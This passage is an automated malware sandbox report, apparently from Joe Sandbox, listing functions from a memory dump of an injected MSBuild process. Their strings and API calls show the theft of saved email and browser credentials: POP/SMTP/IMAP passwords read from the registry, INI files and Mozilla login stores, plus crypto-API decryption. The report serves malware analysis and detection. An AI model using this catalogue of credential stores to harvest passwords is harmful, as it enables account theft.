RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17

Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

Non-executed Functions

Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A

Strings

CryptAcquireContextA, xrefs: 004047E6
CryptDestroyHash, xrefs: 00404820
CryptDeriveKey, xrefs: 00404838
CryptCreateHash, xrefs: 004047FC
CryptImportKey, xrefs: 00404844
CryptDecrypt, xrefs: 0040482C
CryptReleaseContext, xrefs: 004047F0
CryptDestroyKey, xrefs: 00404850
CryptGetHashParam, xrefs: 00404808
advapi32.dll, xrefs: 004047D5
CryptHashData, xrefs: 00404814

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
API String ID: 2238633743-192783356
Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48

Function 00402DB3 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF

Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8

Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5

Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16

_mbscpy.MSVCRT(?,?), ref: 00402ECA
_mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
_mbscpy.MSVCRT(?,?), ref: 00402F6A
_mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
RegCloseKey.ADVAPI32(?), ref: 00402FD1

Strings

PopLogSecure, xrefs: 00402E89
PopPort, xrefs: 00402E78
PopPassword, xrefs: 00402EA4
DisplayName, xrefs: 00402E0C
SMTPLogSecure, xrefs: 00402F29
PopServer, xrefs: 00402E65
EmailAddress, xrefs: 00402E39
SMTPAccount, xrefs: 00402EE9
SMTPPassword, xrefs: 00402F44
SMTPServer, xrefs: 00402EFF
PopAccount, xrefs: 00402E4F
SMTPPort, xrefs: 00402F15

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscpy$QueryValue$CloseOpen
String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
API String ID: 52435246-1534328989
Opcode ID: 91169ad7c3c57fb748ac503c8dcf5f8b642523e730810cbb62e513eeb30698d8
Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
Opcode Fuzzy Hash: 91169ad7c3c57fb748ac503c8dcf5f8b642523e730810cbb62e513eeb30698d8
Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98

Function 00406DFC Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32 ref: 00406E06

Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13

GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
GlobalLock.KERNEL32(00000000), ref: 00406E41
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
GlobalUnlock.KERNEL32(00000000), ref: 00406E63
SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
GetLastError.KERNEL32 ref: 00406E74
CloseHandle.KERNEL32(?), ref: 00406E80
GetLastError.KERNEL32 ref: 00406E8B
CloseClipboard.USER32 ref: 00406E94

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
String ID:
API String ID: 3604893535-0
Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9

Function 00406E9F Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32 ref: 00406EA7
strlen.MSVCRT ref: 00406EB4
GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
GlobalLock.KERNEL32(00000000), ref: 00406ED0
memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
CloseClipboard.USER32 ref: 00406EFB

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
String ID:
API String ID: 3116012682-0
Opcode ID: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
Instruction ID: 469d781c3ef94e65abf7249e996c377109e97d6fa28bdd4c6fbc6e531372765c
Opcode Fuzzy Hash: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
Instruction Fuzzy Hash: FFF0BB3F1002196BD2502FA5FC8CE5B776CDB85B56709413DF906D2252DE34980447F9

Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON

Download Yara Rule

Strings

POP3Server, xrefs: 0040346C
ESMTPPassword, xrefs: 0040345A
SMTPServer, xrefs: 0040342C
POP3Password, xrefs: 00403490
ESMTPUsername, xrefs: 00403448
POP3Username, xrefs: 0040347E

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfileString_mbscmpstrlen
String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
API String ID: 3963849919-1658304561
Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59

Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

Strings

(yE, xrefs: 0040172C
(yE, xrefs: 0040178E
(yE, xrefs: 0040171F

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@??3@memcpymemset
String ID: (yE$(yE$(yE
API String ID: 1865533344-362086290
Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69

Function 00442D8E Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 004431AD
strncmp.MSVCRT ref: 004431BD
memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276

Strings

yacute;, xrefs: 00443166
apos;, xrefs: 00442DBC
Ntilde;, xrefs: 00442FBB
acirc;, xrefs: 00443065
oacute;, xrefs: 0044311A
cent;, xrefs: 00442DE5
Otilde;, xrefs: 00442FE3
frac34;, xrefs: 00442EFD
iquest;, xrefs: 00442F07
divide;, xrefs: 0044313C
times;, xrefs: 00442FF7
Uacute;, xrefs: 00443015
ordf;, xrefs: 00442E35
otilde;, xrefs: 0044312E
Euml;, xrefs: 00442F7F
Aring;, xrefs: 00442F43
Ograve;, xrefs: 00442FC5
egrave;, xrefs: 004430AC
Ucirc;, xrefs: 0044301F
yuml;, xrefs: 00443174
curren;, xrefs: 00442DF9
eacute;, xrefs: 004430B6
Eacute;, xrefs: 00442F6B
aelig;, xrefs: 00443098
ouml;, xrefs: 00443135
eth;, xrefs: 004430FC
copy;, xrefs: 00442E2B
deg;, xrefs: 00442E71
szlig;, xrefs: 00443047
auml;, xrefs: 00443084
gt;, xrefs: 00442DA7
Ugrave;, xrefs: 0044300B
Iuml;, xrefs: 00442FA7
aacute;, xrefs: 0044305B
brvbar;, xrefs: 00442E0D
frac12;, xrefs: 00442EF3
nbsp;, xrefs: 00442DB5
Atilde;, xrefs: 00442F2F
ograve;, xrefs: 00443110
Iacute;, xrefs: 00442F93
agrave;, xrefs: 00443051
sect;, xrefs: 00442E17
pound;, xrefs: 00442DEF
ocirc;, xrefs: 00443124
uml;, xrefs: 00442E21
atilde;, xrefs: 0044306F
Yacute;, xrefs: 00443033
Ouml;, xrefs: 00442FED
Oacute;, xrefs: 00442FCF
ugrave;, xrefs: 0044314A
para;, xrefs: 00442EAD
ordm;, xrefs: 00442ED5
ntilde;, xrefs: 00443106
Ecirc;, xrefs: 00442F75
lt;, xrefs: 00442DA0
micro;, xrefs: 00442EA3
raquo;, xrefs: 00442EDF
iacute;, xrefs: 004430DE
uuml;, xrefs: 0044315F
cedil;, xrefs: 00442EC1
Acirc;, xrefs: 00442F25
AElig;, xrefs: 00442F4D
middot;, xrefs: 00442EB7
ucirc;, xrefs: 00443158
Ccedil;, xrefs: 00442F57
Agrave;, xrefs: 00442F11
yen;, xrefs: 00442E03
plusmn;, xrefs: 00442E7B
ecirc;, xrefs: 004430C0
aring;, xrefs: 0044308E
Auml;, xrefs: 00442F39
Oslash;, xrefs: 00443001
euml;, xrefs: 004430CA
ETH;, xrefs: 00442FB1
acute;, xrefs: 00442E99
reg;, xrefs: 00442E5D
iuml;, xrefs: 004430F2
ccedil;, xrefs: 004430A2
Egrave;, xrefs: 00442F61
amp;, xrefs: 00442D99
oslash;, xrefs: 00443143
frac14;, xrefs: 00442EE9
Uuml;, xrefs: 00443029
igrave;, xrefs: 004430D4
Aacute;, xrefs: 00442F1B
quot;, xrefs: 00442DAE
sup1;, xrefs: 00442ECB
Igrave;, xrefs: 00442F89
iexcl;, xrefs: 00442DDB
not;, xrefs: 00442E49
thorn;, xrefs: 0044316D
Icirc;, xrefs: 00442F9D
sup3;, xrefs: 00442E8F
shy;, xrefs: 00442E53
THORN;, xrefs: 0044303D
sup2;, xrefs: 00442E85
uacute;, xrefs: 00443151
Ocirc;, xrefs: 00442FD9
laquo;, xrefs: 00442E3F
macr;, xrefs: 00442E67
icirc;, xrefs: 004430E8

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
API String ID: 1895597112-3210201812
Opcode ID: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
Opcode Fuzzy Hash: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58

Function 00443C71 Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00443C83
strcmp.MSVCRT ref: 00443CCF
strcmp.MSVCRT ref: 00443CF8
strcmp.MSVCRT ref: 00443D21
strcmp.MSVCRT ref: 00443D4A
strcmp.MSVCRT ref: 00443D73
strcmp.MSVCRT ref: 00443DA6
strcmp.MSVCRT ref: 00443DD9
strcmp.MSVCRT ref: 00443E45
strcmp.MSVCRT ref: 00443E75
strcmp.MSVCRT ref: 00443EA5
strcmp.MSVCRT ref: 00443ED5
strcmp.MSVCRT ref: 00443EFF
strcmp.MSVCRT ref: 00443F28
strcmp.MSVCRT ref: 00443E0C

Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20

_strcmpi.MSVCRT ref: 00443F98
_strcmpi.MSVCRT ref: 00443FA9
_strcmpi.MSVCRT ref: 00443FBA
_strcmpi.MSVCRT ref: 00443F6F

Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384

_strcmpi.MSVCRT ref: 00443FE3
_strcmpi.MSVCRT ref: 0044400C
_strcmpi.MSVCRT ref: 0044401D
_strcmpi.MSVCRT ref: 0044402E

Strings

NNTP_Port, xrefs: 00443F92
POP3, xrefs: 00443E39
IMAP_Port, xrefs: 00443FA3
POP3_User_Name, xrefs: 00443D6D
IMAP, xrefs: 00443E69
IMAP_Secure_Connection, xrefs: 00444017
SMTP_Port, xrefs: 00443F63
NNTP_User_Name, xrefs: 00443DD3
IMAP_Server, xrefs: 00443CF2
NNTP, xrefs: 00443E99
POP3_Server, xrefs: 00443CC3
SMTP_User_Name, xrefs: 00443E06
NNTP_Email_Address, xrefs: 00443EF9
POP3_Port, xrefs: 00443FB4
SMTP, xrefs: 00443EC9
Account_Name, xrefs: 00443C7D
SMTP_Email_Address, xrefs: 00443F22
NNTP_Secure_Connection, xrefs: 00444006
NNTP_Server, xrefs: 00443D1B
POP3_Secure_Connection, xrefs: 00444028
SMTP_Secure_Connection, xrefs: 00443FDD
SMTP_Server, xrefs: 00443D44
IMAP_User_Name, xrefs: 00443DA0

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: strcmp$_strcmpi$memcpystrlenstrtoul
String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
API String ID: 1714764973-479759155
Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D

Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040EBD8

Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7

memset.MSVCRT ref: 0040EC2B
memset.MSVCRT ref: 0040EC47
MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
memset.MSVCRT ref: 0040ECDD
memset.MSVCRT ref: 0040ECF2
_mbscpy.MSVCRT(?,00000000), ref: 0040ED59
_mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
_mbscpy.MSVCRT(?,00000000), ref: 0040ED85
_mbscpy.MSVCRT(?,?), ref: 0040ED9B
_mbscpy.MSVCRT(?,?), ref: 0040EDB1
_mbscpy.MSVCRT(?,?), ref: 0040EDC7
memset.MSVCRT ref: 0040EDE1

Strings

+, xrefs: 0040EBBF
/, xrefs: 0040EBA7
:, xrefs: 0040EBAF
mailbox://%s, xrefs: 0040EE91
imap://%s, xrefs: 0040EEA6
, xrefs: 0040EBBB
e, xrefs: 0040EBA3
,, xrefs: 0040EBAB
", xrefs: 0040EBB7
8, xrefs: 0040EBCB
smtp://%s, xrefs: 0040EF8C
$, xrefs: 0040EBC3
$, xrefs: 0040EBC7

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$_mbscpy$ByteCharMultiWidestrlen
String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
API String ID: 3137614212-1455797042
Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65

Function 0040DD7B Relevance: 66.3, APIs: 28, Strings: 16, Instructions: 303stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040DDA0
strlen.MSVCRT ref: 0040DDAB
strncmp.MSVCRT ref: 0040DDB8
_strcmpi.MSVCRT ref: 0040DDF5
_strcmpi.MSVCRT ref: 0040DE17
strlen.MSVCRT ref: 0040DE37
strncmp.MSVCRT ref: 0040DE44
_strcmpi.MSVCRT ref: 0040DE89
atoi.MSVCRT(?,00000000), ref: 0040DE97
_strcmpi.MSVCRT ref: 0040DEAB
_strcmpi.MSVCRT ref: 0040DECD
strlen.MSVCRT ref: 0040DEED
strncmp.MSVCRT ref: 0040DEFA

Part of subcall function 0040DCF4: memset.MSVCRT ref: 0040DD2A
Part of subcall function 0040DCF4: memcpy.MSVCRT(00000000,?,00000000), ref: 0040DD4C
Part of subcall function 0040DCF4: atoi.MSVCRT(00000000,00000000,?,00000000), ref: 0040DD60

_strcmpi.MSVCRT ref: 0040DF43
_strcmpi.MSVCRT ref: 0040DF65
_strcmpi.MSVCRT ref: 0040DF87
_strcmpi.MSVCRT ref: 0040DFA9
atoi.MSVCRT(?,00000000), ref: 0040DFB7
_strcmpi.MSVCRT ref: 0040DFCB
_strcmpi.MSVCRT ref: 0040DFDE
strlen.MSVCRT ref: 0040DFF9
strncmp.MSVCRT ref: 0040E005
_strcmpi.MSVCRT ref: 0040E04D

Part of subcall function 0040DC9F: memcpy.MSVCRT(?,?,-00000001), ref: 0040DCD7

_strcmpi.MSVCRT ref: 0040E06F
_strcmpi.MSVCRT ref: 0040E08E
_strcmpi.MSVCRT ref: 0040E0B0
strlen.MSVCRT ref: 0040E0CB
strlen.MSVCRT ref: 0040E0D5

Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20

Strings

mail.identity, xrefs: 0040DFF3, 0040DFF8, 0040E001
server, xrefs: 0040DDEB
identities, xrefs: 0040DE0F
mail.server, xrefs: 0040DEE7, 0040DEEC, 0040DEF5
mail.smtpserver, xrefs: 0040DE31, 0040DE36, 0040DE3F
port, xrefs: 0040DE7F, 0040DFA1
signon.signonfilename, xrefs: 0040E0A8
fullname, xrefs: 0040E067
mail.account.account, xrefs: 0040DDA5, 0040DDAA, 0040DDB3
useremail, xrefs: 0040E043
smtpserver, xrefs: 0040E086
type, xrefs: 0040DF5D
true, xrefs: 0040DFD6
username, xrefs: 0040DEC5, 0040DF39
useSecAuth, xrefs: 0040DFC3
hostname, xrefs: 0040DEA3, 0040DF7F

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
API String ID: 2814039832-2206097438
Opcode ID: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
Opcode Fuzzy Hash: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C

Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON

Download Yara Rule

APIs

Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7

Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C

Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C

memset.MSVCRT ref: 0040E5B8
memset.MSVCRT ref: 0040E5CD
_mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
_mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
_mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
_mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
_mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
_mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
memset.MSVCRT ref: 0040E6B5
memset.MSVCRT ref: 0040E6CC

Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE

memset.MSVCRT ref: 0040E736
memset.MSVCRT ref: 0040E74F
sprintf.MSVCRT ref: 0040E76D
sprintf.MSVCRT ref: 0040E788
_strcmpi.MSVCRT ref: 0040E79E
_strcmpi.MSVCRT ref: 0040E7B7
_strcmpi.MSVCRT ref: 0040E7D3
memset.MSVCRT ref: 0040E858
sprintf.MSVCRT ref: 0040E873
_strcmpi.MSVCRT ref: 0040E889
_strcmpi.MSVCRT ref: 0040E8A5

Strings

mailbox://%s, xrefs: 0040E767
imap://%s, xrefs: 0040E782
passwordField, xrefs: 0040E609
httpRealm, xrefs: 0040E616
hostname, xrefs: 0040E5D5
smtp://%s, xrefs: 0040E86D
usernameField, xrefs: 0040E5FC
encryptedUsername, xrefs: 0040E5E2
encryptedPassword, xrefs: 0040E5EF
logins, xrefs: 0040E54D

Memory Dump Source

